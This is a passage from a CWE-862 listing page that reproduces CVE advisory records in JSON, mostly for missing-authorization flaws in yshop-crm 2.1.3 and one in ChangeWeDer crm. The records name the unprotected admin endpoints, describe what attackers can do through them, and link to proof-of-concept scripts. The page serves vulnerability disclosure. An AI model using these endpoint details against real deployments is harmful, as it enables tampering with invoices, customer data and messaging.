Common Weakness Enumeration

CWE-862

Allowed-with-Review

Missing Authorization

Abstraction: Class · Status: Incomplete

The product does not perform an authorization check when an actor attempts to access a resource or perform an action.

17593 vulnerabilities reference this CWE, most recent first.

CVE-2026-92458 (GCVE-0-2026-92458)

Vulnerability from cvelistv5 – Published: 2026-09-16 11:07 – Updated: 2026-09-18 17:42
VLAI
Title
yshop-crm through 2.1.3 Missing Authorization via StoreProductController onSale
Summary
yshop-crm through 2.1.3 contains a missing authorization vulnerability in the StoreProductController onSale handler that allows authenticated back-office users to modify product sale status. Attackers can invoke the GET /admin-api/product/store-product/sale endpoint with sequential product IDs to withdraw entire product catalogs from sale or re-enable withdrawn products without proper permission checks.
SSVC
Exploitation: poc Automatable: no Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-09-18 17:42 UTC
CWE
Impacted products
Vendor Product Version
guchengwuyue yshop-crm Affected: 0 , ≤ 2.1.3 (semver)
Create a notification for this product.
Date Public
2026-09-13 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-92458",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-09-18T17:42:09.818550Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-09-18T17:42:45.622Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/LinYuanyi1/cve-request-poc/blob/master/yshop-crm/C05_store_product_sale_toggle.py"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageURL": "pkg:github/guchengwuyue/yshop-crm",
          "product": "yshop-crm",
          "repo": "https://github.com/guchengwuyue/yshop-crm",
          "vendor": "guchengwuyue",
          "versions": [
            {
              "lessThanOrEqual": "2.1.3",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Mingsheng Lin (lincoke)"
        }
      ],
      "datePublic": "2026-09-13T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "yshop-crm through 2.1.3 contains a missing authorization vulnerability in the StoreProductController onSale handler that allows authenticated back-office users to modify product sale status. Attackers can invoke the GET /admin-api/product/store-product/sale endpoint with sequential product IDs to withdraw entire product catalogs from sale or re-enable withdrawn products without proper permission checks."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "LOW"
          },
          "format": "CVSS"
        },
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "version": "3.1"
          },
          "format": "CVSS"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-09-16T11:07:28.070Z",
        "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "shortName": "VulnCheck"
      },
      "references": [
        {
          "name": "Reporter proof of concept: unauthorized listing-state change via /product/store-product/sale",
          "tags": [
            "exploit"
          ],
          "url": "https://github.com/LinYuanyi1/cve-request-poc/blob/master/yshop-crm/C05_store_product_sale_toggle.py"
        },
        {
          "name": "onSale declared without @PreAuthorize at 2.1.3",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/yshop-module-mall/yshop-module-product-biz/src/main/java/co/yixiang/yshop/module/product/controller/admin/storeproduct/StoreProductController.java#L116"
        },
        {
          "name": "onSale writes is_show with no ownership or existence check",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/yshop-module-mall/yshop-module-product-biz/src/main/java/co/yixiang/yshop/module/product/service/storeproduct/StoreProductServiceImpl.java#L552"
        },
        {
          "name": "Maven revision property showing the affected tree is version 2.1.3",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/pom.xml#L30"
        },
        {
          "name": "yshop-crm source repository",
          "tags": [
            "product"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm"
        },
        {
          "name": "VulnCheck Advisory: yshop-crm through 2.1.3 Missing Authorization via StoreProductController onSale",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://www.vulncheck.com/advisories/yshop-crm-through-2.1.3-missing-authorization-via-storeproductcontroller-onsale"
        }
      ],
      "title": "yshop-crm through 2.1.3 Missing Authorization via StoreProductController onSale",
      "x_generator": {
        "engine": "vulncheck-endgame"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
    "assignerShortName": "VulnCheck",
    "cveId": "CVE-2026-92458",
    "datePublished": "2026-09-16T11:07:28.070Z",
    "dateReserved": "2026-09-16T10:40:54.769Z",
    "dateUpdated": "2026-09-18T17:42:45.622Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-92457 (GCVE-0-2026-92457)

Vulnerability from cvelistv5 – Published: 2026-09-16 11:07 – Updated: 2026-09-21 17:50
VLAI
Title
yshop-crm through 2.1.3 Missing Authorization via CrmInvoiceController issueInvoice
Summary
yshop-crm through 2.1.3 contains a missing authorization vulnerability in the CrmInvoiceController issueInvoice endpoint that allows authenticated back-office users to issue arbitrary invoices. Attackers can call the PUT /admin-api/crm/invoice/issue endpoint without required permissions to modify invoice status, inflate contract invoiced amounts with attacker-chosen values, and trigger invoice emails to arbitrary addresses.
SSVC
Exploitation: poc Automatable: no Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-09-21 17:50 UTC
CWE
Impacted products
Vendor Product Version
guchengwuyue yshop-crm Affected: 0 , ≤ 2.1.3 (semver)
Create a notification for this product.
Date Public
2026-09-13 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-92457",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-09-21T17:50:09.951782Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-09-21T17:50:17.523Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageURL": "pkg:github/guchengwuyue/yshop-crm",
          "product": "yshop-crm",
          "repo": "https://github.com/guchengwuyue/yshop-crm",
          "vendor": "guchengwuyue",
          "versions": [
            {
              "lessThanOrEqual": "2.1.3",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Mingsheng Lin (lincoke)"
        }
      ],
      "datePublic": "2026-09-13T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "yshop-crm through 2.1.3 contains a missing authorization vulnerability in the CrmInvoiceController issueInvoice endpoint that allows authenticated back-office users to issue arbitrary invoices. Attackers can call the PUT /admin-api/crm/invoice/issue endpoint without required permissions to modify invoice status, inflate contract invoiced amounts with attacker-chosen values, and trigger invoice emails to arbitrary addresses."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "HIGH"
          },
          "format": "CVSS"
        },
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "format": "CVSS"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-09-16T11:07:27.376Z",
        "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "shortName": "VulnCheck"
      },
      "references": [
        {
          "name": "Reporter proof of concept: unauthorized invoice issuance via /crm/invoice/issue",
          "tags": [
            "exploit"
          ],
          "url": "https://github.com/LinYuanyi1/cve-request-poc/blob/master/yshop-crm/C03_crm_invoice_issue.py"
        },
        {
          "name": "issueInvoice declared without @PreAuthorize at 2.1.3",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/yshop-module-crm/yshop-module-crm-biz/src/main/java/co/yixiang/yshop/module/crm/controller/admin/crminvoice/CrmInvoiceController.java#L80"
        },
        {
          "name": "issueInvoice trusts the request body for the contract amount with no ownership check",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/yshop-module-crm/yshop-module-crm-biz/src/main/java/co/yixiang/yshop/module/crm/service/crminvoice/CrmInvoiceServiceImpl.java#L317"
        },
        {
          "name": "Maven revision property showing the affected tree is version 2.1.3",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/pom.xml#L30"
        },
        {
          "name": "yshop-crm source repository",
          "tags": [
            "product"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm"
        },
        {
          "name": "VulnCheck Advisory: yshop-crm through 2.1.3 Missing Authorization via CrmInvoiceController issueInvoice",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://www.vulncheck.com/advisories/yshop-crm-through-2.1.3-missing-authorization-via-crminvoicecontroller-issueinvoice"
        }
      ],
      "title": "yshop-crm through 2.1.3 Missing Authorization via CrmInvoiceController issueInvoice",
      "x_generator": {
        "engine": "vulncheck-endgame"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
    "assignerShortName": "VulnCheck",
    "cveId": "CVE-2026-92457",
    "datePublished": "2026-09-16T11:07:27.376Z",
    "dateReserved": "2026-09-16T10:40:54.436Z",
    "dateUpdated": "2026-09-21T17:50:17.523Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-92456 (GCVE-0-2026-92456)

Vulnerability from cvelistv5 – Published: 2026-09-16 11:07 – Updated: 2026-09-16 13:27
VLAI
Title
yshop-crm through 2.1.3 Missing Authorization via CRM Customer Rule-Configuration Endpoints
Summary
yshop-crm through 2.1.3 fails to enforce authorization on the saveRedisSet and getRedisSet endpoints in CrmCustomerController, allowing any authenticated back-office user to read and modify installation-wide lead-allocation and customer auto-recycling policy. Attackers can invoke these endpoints to manipulate shared Redis keys controlling customer auto-recycling behavior, causing mass customer data deletion, disabling lead recycling, or blocking customer creation across the deployment.
SSVC
Exploitation: poc Automatable: no Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-09-16 13:27 UTC
CWE
Impacted products
Vendor Product Version
guchengwuyue yshop-crm Affected: 0 , ≤ 2.1.3 (semver)
Create a notification for this product.
Date Public
2026-09-13 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-92456",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-09-16T13:27:05.743404Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-09-16T13:27:23.763Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageURL": "pkg:github/guchengwuyue/yshop-crm",
          "product": "yshop-crm",
          "repo": "https://github.com/guchengwuyue/yshop-crm",
          "vendor": "guchengwuyue",
          "versions": [
            {
              "lessThanOrEqual": "2.1.3",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Mingsheng Lin (lincoke)"
        }
      ],
      "datePublic": "2026-09-13T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "yshop-crm through 2.1.3 fails to enforce authorization on the saveRedisSet and getRedisSet endpoints in CrmCustomerController, allowing any authenticated back-office user to read and modify installation-wide lead-allocation and customer auto-recycling policy. Attackers can invoke these endpoints to manipulate shared Redis keys controlling customer auto-recycling behavior, causing mass customer data deletion, disabling lead recycling, or blocking customer creation across the deployment."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "LOW",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "HIGH"
          },
          "format": "CVSS"
        },
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
            "version": "3.1"
          },
          "format": "CVSS"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-09-16T11:07:26.713Z",
        "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "shortName": "VulnCheck"
      },
      "references": [
        {
          "name": "Reporter proof of concept: unauthorized policy rewrite via /crm/customer/saveRedisSet",
          "tags": [
            "exploit"
          ],
          "url": "https://github.com/LinYuanyi1/cve-request-poc/blob/master/yshop-crm/C04_crm_customer_save_redis_set.py"
        },
        {
          "name": "saveRedisSet declared without @PreAuthorize and writing three Redis keys at 2.1.3",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/yshop-module-crm/yshop-module-crm-biz/src/main/java/co/yixiang/yshop/module/crm/controller/admin/crmcustomer/CrmCustomerController.java#L136"
        },
        {
          "name": "CustomerAutoJob consumes notRecordDay and notSuccessDay to recycle customers",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/yshop-module-crm/yshop-module-crm-biz/src/main/java/co/yixiang/yshop/module/crm/job/CustomerAutoJob.java#L34"
        },
        {
          "name": "openCustomer nulls customer ownership and deletes follow-up records",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/yshop-module-crm/yshop-module-crm-biz/src/main/java/co/yixiang/yshop/module/crm/service/crmcustomer/CrmCustomerServiceImpl.java#L160"
        },
        {
          "name": "Maven revision property showing the affected tree is version 2.1.3",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/pom.xml#L30"
        },
        {
          "name": "yshop-crm source repository",
          "tags": [
            "product"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm"
        },
        {
          "name": "VulnCheck Advisory: yshop-crm through 2.1.3 Missing Authorization via CRM Customer Rule-Configuration Endpoints",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://www.vulncheck.com/advisories/yshop-crm-through-2.1.3-missing-authorization-via-crm-customer-rule-configuration-endpoints"
        }
      ],
      "title": "yshop-crm through 2.1.3 Missing Authorization via CRM Customer Rule-Configuration Endpoints",
      "x_generator": {
        "engine": "vulncheck-endgame"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
    "assignerShortName": "VulnCheck",
    "cveId": "CVE-2026-92456",
    "datePublished": "2026-09-16T11:07:26.713Z",
    "dateReserved": "2026-09-16T10:40:54.112Z",
    "dateUpdated": "2026-09-16T13:27:23.763Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-92455 (GCVE-0-2026-92455)

Vulnerability from cvelistv5 – Published: 2026-09-16 11:07 – Updated: 2026-09-17 19:26
VLAI
Title
yshop-crm through 2.1.3 Missing Authorization via CRM Customer Messaging Endpoints
Summary
yshop-crm through 2.1.3 fails to enforce authorization on the sendSms and sendMail endpoints in CrmCustomerController, allowing any authenticated back-office user to send SMS and email to arbitrary customers. Attackers can invoke POST /admin-api/crm/customer/send-sms and POST /admin-api/crm/customer/send-mail with arbitrary customerIds, templateCode, and templateParams to deliver unauthorized messages through the organization's SMS and email channels.
SSVC
Exploitation: poc Automatable: no Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-09-17 18:39 UTC
CWE
Impacted products
Vendor Product Version
guchengwuyue yshop-crm Affected: 0 , ≤ 2.1.3 (semver)
Create a notification for this product.
Date Public
2026-09-13 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-92455",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-09-17T18:39:33.565308Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-09-17T19:26:53.422Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageURL": "pkg:github/guchengwuyue/yshop-crm",
          "product": "yshop-crm",
          "repo": "https://github.com/guchengwuyue/yshop-crm",
          "vendor": "guchengwuyue",
          "versions": [
            {
              "lessThanOrEqual": "2.1.3",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Mingsheng Lin (lincoke)"
        }
      ],
      "datePublic": "2026-09-13T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "yshop-crm through 2.1.3 fails to enforce authorization on the sendSms and sendMail endpoints in CrmCustomerController, allowing any authenticated back-office user to send SMS and email to arbitrary customers. Attackers can invoke POST /admin-api/crm/customer/send-sms and POST /admin-api/crm/customer/send-mail with arbitrary customerIds, templateCode, and templateParams to deliver unauthorized messages through the organization\u0027s SMS and email channels."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "LOW"
          },
          "format": "CVSS"
        },
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "version": "3.1"
          },
          "format": "CVSS"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-09-16T11:07:26.041Z",
        "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "shortName": "VulnCheck"
      },
      "references": [
        {
          "name": "Reporter proof of concept: unauthorized SMS dispatch via /crm/customer/send-sms",
          "tags": [
            "exploit"
          ],
          "url": "https://github.com/LinYuanyi1/cve-request-poc/blob/master/yshop-crm/C01_crm_customer_send_sms.py"
        },
        {
          "name": "Reporter proof of concept: unauthorized mail dispatch via /crm/customer/send-mail",
          "tags": [
            "exploit"
          ],
          "url": "https://github.com/LinYuanyi1/cve-request-poc/blob/master/yshop-crm/C02_crm_customer_send_mail.py"
        },
        {
          "name": "sendSms and sendMail declared without @PreAuthorize at 2.1.3",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/yshop-module-crm/yshop-module-crm-biz/src/main/java/co/yixiang/yshop/module/crm/controller/admin/crmcustomer/CrmCustomerController.java#L122"
        },
        {
          "name": "sendSms resolves recipients from caller-supplied customerIds with no scope predicate",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/yshop-module-crm/yshop-module-crm-biz/src/main/java/co/yixiang/yshop/module/crm/service/crmcustomer/CrmCustomerServiceImpl.java#L264"
        },
        {
          "name": "Maven revision property showing the affected tree is version 2.1.3",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm/blob/5f5810a0e1e4ab0828523ec299bf973c2f9065d7/yshop-crm/pom.xml#L30"
        },
        {
          "name": "yshop-crm source repository",
          "tags": [
            "product"
          ],
          "url": "https://github.com/guchengwuyue/yshop-crm"
        },
        {
          "name": "VulnCheck Advisory: yshop-crm through 2.1.3 Missing Authorization via CRM Customer Messaging Endpoints",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://www.vulncheck.com/advisories/yshop-crm-through-2.1.3-missing-authorization-via-crm-customer-messaging-endpoints"
        }
      ],
      "title": "yshop-crm through 2.1.3 Missing Authorization via CRM Customer Messaging Endpoints",
      "x_generator": {
        "engine": "vulncheck-endgame"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
    "assignerShortName": "VulnCheck",
    "cveId": "CVE-2026-92455",
    "datePublished": "2026-09-16T11:07:26.041Z",
    "dateReserved": "2026-09-16T10:40:53.778Z",
    "dateUpdated": "2026-09-17T19:26:53.422Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-92402 (GCVE-0-2026-92402)

Vulnerability from cvelistv5 – Published: 2026-09-16 16:45 – Updated: 2026-09-22 15:45
VLAI
Title
ChangeWeDer crm top.upstudy.crm.controller.UserController UserController.java index authorization
Summary
A security flaw has been discovered in ChangeWeDer crm up to c07bd4c97141521af6475034bc58523beed51bbd. This issue affects the function index of the file UserController.java of the component top.upstudy.crm.controller.UserController. The manipulation results in missing authorization. The attack can be launched remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.
SSVC
Exploitation: none Automatable: no Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-09-22 15:06 UTC
CWE
References
URL Tags
https://vuldb.com/vuln/405553 vdb-entrytechnical-description
https://vuldb.com/vuln/405553/cti signaturepermissions-required
https://vuldb.com/cve/CVE-2026-92402 third-party-advisory
https://vuldb.com/submit/940349 third-party-advisory
https://github.com/ChangeWeDer/crm/issues/3 issue-tracking
https://github.com/ChangeWeDer/crm/ product
Impacted products
Vendor Product Version
ChangeWeDer crm Affected: c07bd4c97141521af6475034bc58523beed51bbd
    cpe:2.3:a:changeweder:crm:*:*:*:*:*:*:*:*
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-92402",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-09-22T15:06:03.746849Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-09-22T15:45:29.315Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "cpes": [
            "cpe:2.3:a:changeweder:crm:*:*:*:*:*:*:*:*"
          ],
          "modules": [
            "top.upstudy.crm.controller.UserController"
          ],
          "product": "crm",
          "vendor": "ChangeWeDer",
          "versions": [
            {
              "status": "affected",
              "version": "c07bd4c97141521af6475034bc58523beed51bbd"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "value": "mjh_123 (VulDB User)"
        },
        {
          "lang": "en",
          "type": "coordinator",
          "value": "VulDB CNA Team"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A security flaw has been discovered in ChangeWeDer crm up to c07bd4c97141521af6475034bc58523beed51bbd. This issue affects the function index of the file UserController.java of the component top.upstudy.crm.controller.UserController. The manipulation results in missing authorization. The attack can be launched remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X",
            "version": "4.0"
          }
        },
        {
          "cvssV3_1": {
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:X/RL:X/RC:R",
            "version": "3.1"
          }
        },
        {
          "cvssV3_0": {
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
